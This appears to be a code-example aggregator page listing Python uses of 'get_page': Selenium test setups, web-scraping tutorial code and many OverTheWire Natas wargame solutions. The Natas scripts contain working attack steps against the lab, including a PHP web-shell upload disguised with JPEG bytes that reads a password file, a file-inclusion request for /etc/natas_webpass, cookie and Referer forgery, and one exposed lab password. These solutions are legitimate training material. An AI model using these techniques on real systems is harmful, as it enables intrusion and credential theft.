Esempi in Python per get_page, esempi in Python per base.get_page

Esempio n. 1

0

Mostra file

File: test03_blogs.py Progetto: grimpy/jumpscaleX_threebot

def before():
    """Open the blogs page and publish the handles the tests share.

    Sets the module globals ``driver``, ``blogs`` and ``rows`` and then
    asserts that the browser title contains ``"Blogs "``.
    """
    global driver, rows, blogs
    driver = base.set_browser()
    base.get_page(driver, page_url)
    # Look up "blogs_list" through the base helper, then collect the
    # elements with class "row" underneath it.
    blogs = base.find_element("blogs_list")
    rows = blogs.find_elements_by_class_name("row")
    page_title = driver.title
    assert "Blogs " in page_title

Esempio n. 2

0

Mostra file

File: link_scraper.py Progetto: Anandh003/web-scraping

def get_random_external_links(home_url):
    """Return one randomly chosen external link reachable from *home_url*.

    The page is fetched with ``get_page``. When it exposes no external
    links, a random internal link is followed and the search is repeated
    from that page.

    Args:
        home_url: URL of the page to start from.

    Returns:
        One entry picked at random from the external links, or ``None``
        when *home_url* is falsy, ``get_page`` returns a falsy value, or
        the page has neither external nor internal links.

    Note:
        The fallback recurses once per internal hop and keeps no record of
        visited pages, so a site without any external link can recurse
        until Python's recursion limit is hit.
    """
    if not home_url:
        return None

    bs = get_page(home_url)
    if not bs:
        return None

    # Parse the URL once and reuse its components.
    parts = urlparse(home_url)

    external_links = get_external_links(bs, parts.netloc)
    if external_links:
        return random.choice(external_links)

    print('No External Links Found!!, Looking around the site for one')
    internal_links = get_internal_links(bs, f"{parts.scheme}://{parts.netloc}")
    if not internal_links:
        print('No Internal Links Found!!')
        return None

    # Hop to a random internal page and try again from there.
    return get_random_external_links(random.choice(internal_links))

Esempio n. 3

0

Mostra file

File: natas24.py Progetto: AmmmberQin/natas

def natas24():
    """Fetch page 24 with an array-valued ``passwd`` query and print the password.

    Prints the 32-word-character token that follows ``"Password: "`` in the
    response, or a failure message when no such token is present.
    """
    username = "******"
    password = "******"
    content = get_page(24, username, password, "?passwd[]=lol")
    # The lookbehind keeps the "Password: " label out of the match itself.
    match = re.search(r"(?<=Password: )\w{32}", content)
    if match is not None:
        print(match.group(0))
        return
    print("Fail to find password")

Esempio n. 4

0

Mostra file

File: natas26.py Progetto: AmmmberQin/natas

def natas26():
    """Build the ``drawing`` cookie with a PHP helper and print ``img/pass.php``.

    Runs ``php natas26.php``; if it writes anything to stderr a failure
    message is printed and nothing else happens. Otherwise its stdout (with
    newlines removed) is sent as the ``drawing`` cookie, and the content of
    ``img/pass.php`` is fetched and printed.
    """
    username = "******"
    password = "oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T"

    proc = Popen("php natas26.php", shell=True, stdout=PIPE, stderr=PIPE)
    out, err = proc.communicate()
    if err:
        print("Fail to find password")
        return

    cookies = {"drawing": out.decode("utf-8").replace("\n", "")}
    # First request only delivers the cookie; its response is not used.
    get_page(26, username, password, cookies=cookies)

    print(get_page(26, username, password, "img/pass.php"))

Esempio n. 5

0

Mostra file

File: natas07.py Progetto: AmmmberQin/natas

def natas7():
    """Request ``index.php`` with a file path as ``page`` and print the password.

    Prints the 32-word-character token that directly follows ``"<br>\\n"`` in
    the response, or a failure message when none is found.
    """
    username = "******"
    password = "******"
    path = "/index.php?page=/etc/natas_webpass/natas8"
    content = get_page(7, username, password, path)
    match = re.search(r"(?<=<br>\n)\w{32}", content)
    if match is not None:
        print(match.group(0))
        return
    print("Fail to find password")

Esempio n. 6

0

Mostra file

File: natas11.py Progetto: AmmmberQin/natas

def natas11():
    """Send the ``data`` cookie produced by a PHP helper and print the password.

    Runs ``php natas11.php``; any stderr output aborts with a failure
    message. Otherwise the decoded stdout is sent as the ``data`` cookie and
    the token after ``"The password for natas12 is "`` is printed.
    """
    username = "******"
    password = "******"
    proc = Popen("php natas11.php", shell=True, stdout=PIPE, stderr=PIPE)
    out, err = proc.communicate()
    if err:
        print("Fail to find password")
        return
    cookies = {"data": out.decode("utf-8")}
    content = get_page(11, username, password, cookies=cookies)
    match = re.search(r"(?<=The password for natas12 is )\w{32}", content)
    if match is None:
        print("Fail to find password")
    else:
        print(match.group(0))

Esempio n. 7

0

Mostra file

File: natas13.py Progetto: AmmmberQin/natas

def natas13():
    """Upload a PHP payload behind four leading bytes and print its output.

    Posts the payload as ``uploadedfile``, extracts the ``upload/<10 chars>.php``
    path from the response, fetches that path as bytes and prints the body
    with the first four bytes removed. Prints a failure message when the
    upload path is not found in the response.
    """
    username = "******"
    password = "******"
    # Four header bytes followed by the PHP code (the prefix looks like a
    # JPEG signature, presumably to pass a server-side image check).
    _content = b'\xFF\xD8\xFF\xE0<? echo passthru("cat /etc/natas_webpass/natas14"); ?>'
    data = {"MAX_FILE_SIZE": 1000, "filename": "evil.php"}
    files = {"uploadedfile": ("natas13.php", _content)}
    content = post_page(13, username, password, data=data, files=files)
    # The dot is escaped so only a literal ".php" suffix matches.
    match = re.search(r"upload/\S{10}\.php", content)
    if match is None:
        print("Fail to find password")
        return
    upload_path = match.group(0)
    password_content = get_page(13, username, password, "/" + upload_path, byte=True)
    # Drop the four prefix bytes that were prepended to the payload.
    print(password_content[4:].decode())

Esempio n. 8

0

Mostra file

def natas6():
    """Read the secret from ``/includes/secret.inc``, submit it, print the password.

    Prints a failure message and stops if either the secret or the password
    cannot be found in the corresponding response.
    """
    username = "******"
    password = "******"

    secret_content = get_page(6, username, password, "/includes/secret.inc")
    secret_match = re.search(r"(?<=secret = \")\w+", secret_content)
    if secret_match is None:
        print("Fail to find password")
        return

    form = {"secret": secret_match.group(0), "submit": "Submit"}
    content = post_page(6, username, password, data=form)
    password_match = re.search(r"(?<=The password for natas7 is )\w+", content)
    if password_match is None:
        print("Fail to find password")
    else:
        print(password_match.group(0))

Esempio n. 9

0

Mostra file

File: navigating_trees.py Progetto: Anandh003/web-scraping

def main():
    """Print several tree-navigation views of the ``giftList`` table page.

    Fetches the sample page with ``get_page`` and prints, in order: the
    table's children, the siblings after and before its first row, the text
    of the cell preceding the parent of one image, every image whose ``src``
    matches a path pattern, and every tag that has exactly two attributes.
    """
    bs = get_page('http://www.pythonscraping.com/pages/page3.html')

    # Descendants vs children
    # Children - exactly one tag below parent
    # Descendants - any level below parent
    # All children are descendants but not all descendants are children

    print('------------------Children-------------------')
    # Look the table up once; every section below navigates from it.
    gift_table = bs.find('table', {'id': 'giftList'})
    for child in gift_table.children:
        print(child)

    print('------------------Next Siblings-------------------')
    # Next siblings of the first row: every row except the header.
    for sibling in gift_table.tr.next_siblings:
        print(sibling)

    print('------------------Previous Siblings-------------------')
    # Previous siblings of the first row: nothing, because it is the first.
    for sibling in gift_table.tr.previous_siblings:
        print(sibling)

    # Dealing with parents: from the image go up to its parent, then to the
    # sibling just before that parent, and print its text.
    gift_image = bs.find('img', {'src': '../img/gifts/img1.jpg'})
    print(gift_image.parent.previous_sibling.get_text())

    # Regular expressions and Beautiful Soup
    # Take <img src="../img/gifts/img3.jpeg">
    # Instead of relying on tag position, match on the file path.
    # Raw string: "\." and "\/" are not valid escapes in a normal literal.
    image_src = re.compile(r'\.\.\/img\/gifts\/img.*\.jpg')
    for image in bs.find_all('img', {'src': image_src}):
        print(image)

    # Lambda expression
    # A predicate function can be passed to find_all in place of a tag name.
    attributes = bs.find_all(lambda tag: len(tag.attrs) == 2)
    print(20 * '*' + 'Tags with 2 attributest' + 20 * '*' + '\n', attributes)

Esempio n. 10

0

Mostra file

File: wiki_scraper.py Progetto: Anandh003/web-scraping

def get_links(pages, url=''):
    """Recursively print and collect ``/wiki/`` links starting from *url*.

    For the fetched page, prints the ``h1`` text, the first paragraph under
    ``mw-content-text`` and the edit link under ``ca-edit`` (a notice is
    printed instead if any of those is missing). Every ``/wiki/`` href not
    yet in *pages* is printed, added to *pages* and crawled in turn.

    Args:
        pages: Mutable set of hrefs already seen; updated in place.
        url: Path on ``en.wikipedia.org`` to fetch, with or without a
            leading slash. Defaults to the site root.

    Note:
        Recursion depth grows with every new link followed and there is no
        depth limit.
    """
    # Harvested hrefs already begin with "/"; strip it so the request URL
    # does not end up with "//" after the host name.
    url = f"http://en.wikipedia.org/{url.lstrip('/')}"
    bs_obj = get_page(url)
    try:
        print(bs_obj.h1.get_text())
        print(
            bs_obj.find('', {
                'id': 'mw-content-text'
            }).find_all('p')[0].get_text())
        print(
            bs_obj.find('', {
                'id': 'ca-edit'
            }).find('span').find('a').attrs['href'])
    except AttributeError:
        print('this link is missing something! Continuing')

    for link in bs_obj.find_all('a', href=re.compile('^(/wiki/)')):
        new_section = link.attrs.get('href')
        if new_section is None or new_section in pages:
            continue
        print('-' * 30 + '\n' + new_section)
        pages.add(new_section)
        get_links(pages, new_section)

Esempio n. 11

0

Mostra file

File: natas05.py Progetto: AmmmberQin/natas

# -*- coding: utf-8 -*-
from base import get_page
import re

username = "******"
password = "******"
# Send the request with the "loggedin" cookie set to "1".
cookies = {"loggedin": "1"}
content = get_page(5, username, password, cookies=cookies)
# Grab the word characters that follow "natas6 is " in the response.
password = re.search(r"(?<=natas6 is )\w+", content)
if password is None:
    print("Fail to find password")
else:
    print(password.group(0))

Esempio n. 12

0

Mostra file

File: test02_alerta.py Progetto: grimpy/jumpscaleX_threebot

def before():
    """Open the page under test and check that its title mentions "Alerta".

    Stores the browser handle in the module global ``driver``.
    """
    global driver
    driver = base.set_browser()
    base.get_page(driver, page_url)
    page_title = driver.title
    assert "Alerta" in page_title

Esempio n. 13

0

Mostra file

# -*- coding: utf-8 -*-
from base import get_page
import re

username = "******"
password = "******"
content = get_page(2, username, password, "/files/users.txt")
# Grab the word characters that follow "natas3:" in the fetched file.
password = re.search(r"(?<=natas3:)\w+", content)
if password is None:
    print("Fail to find password")
else:
    print(password.group(0))

Esempio n. 14

0

Mostra file

# -*- coding: utf-8 -*-
from base import get_page
import re

username = "******"
password = "******"
content = get_page(3, username, password, "/s3cr3t/users.txt")
# Grab the word characters that follow "natas4:" in the fetched file.
password = re.search(r"(?<=natas4:)\w+", content)
if password is None:
    print("Fail to find password")
else:
    print(password.group(0))

Esempio n. 15

0

Mostra file

File: natas04.py Progetto: AmmmberQin/natas

# -*- coding: utf-8 -*-
from base import get_page
import re

username = "******"
password = "******"
# Send the request with a Referer header pointing at the natas5 host.
headers = {"Referer": "http://natas5.natas.labs.overthewire.org/"}
content = get_page(4, username, password, headers=headers)
# Grab the word characters that follow "natas5 is " in the response.
password = re.search(r"(?<=natas5 is )\w+", content)
if password is None:
    print("Fail to find password")
else:
    print(password.group(0))

Esempio n. 16

0

Mostra file

# -*- coding: utf-8 -*-
from base import get_page
import re

username = "******"
password = "******"
content = get_page(1, username, password)
# Grab the word characters that follow the announcement sentence.
password = re.search(r"(?<=The password for natas2 is )\w+", content)
if password is None:
    print("Fail to find password")
else:
    print(password.group(0))

Esempio n. 17

0

Mostra file

File: advanced_html_parsing.py Progetto: Anandh003/web-scraping

# CHAPTER 2 - Advanced HTML Parsing
from base import get_page

bs = get_page('http://www.pythonscraping.com/pages/warandpeace.html')

# find_all(tag, attributes, recursive, text, limit, keywords)
# find_all is the current spelling; findAll is only a legacy alias.
names = bs.find_all('span', {'class': 'green'})

# Collapse to a set so each distinct text is printed once; set iteration
# order is not defined, so the output order may vary.
names = {name.get_text() for name in names}

for name in names:
    print(name)

# Other BS objects
#     Bs object               - Instance of BeautifulSoup
#     Tag object              - Retrieved in a list or by calling the find and find_all functions
#     navigableString object  - Used to represent a string rather than a tag
#     comment object          - Used to find HTML comments

Esempio n. 18

0

Mostra file

File: test01_myjobs.py Progetto: grimpy/jumpscaleX_threebot

def before():
    """Open the page under test and check its title mentions "Myjobs Visualizer".

    Stores the browser handle in the module global ``driver``.
    """
    global driver
    driver = base.set_browser()
    base.get_page(driver, page_url)
    page_title = driver.title
    assert "Myjobs Visualizer" in page_title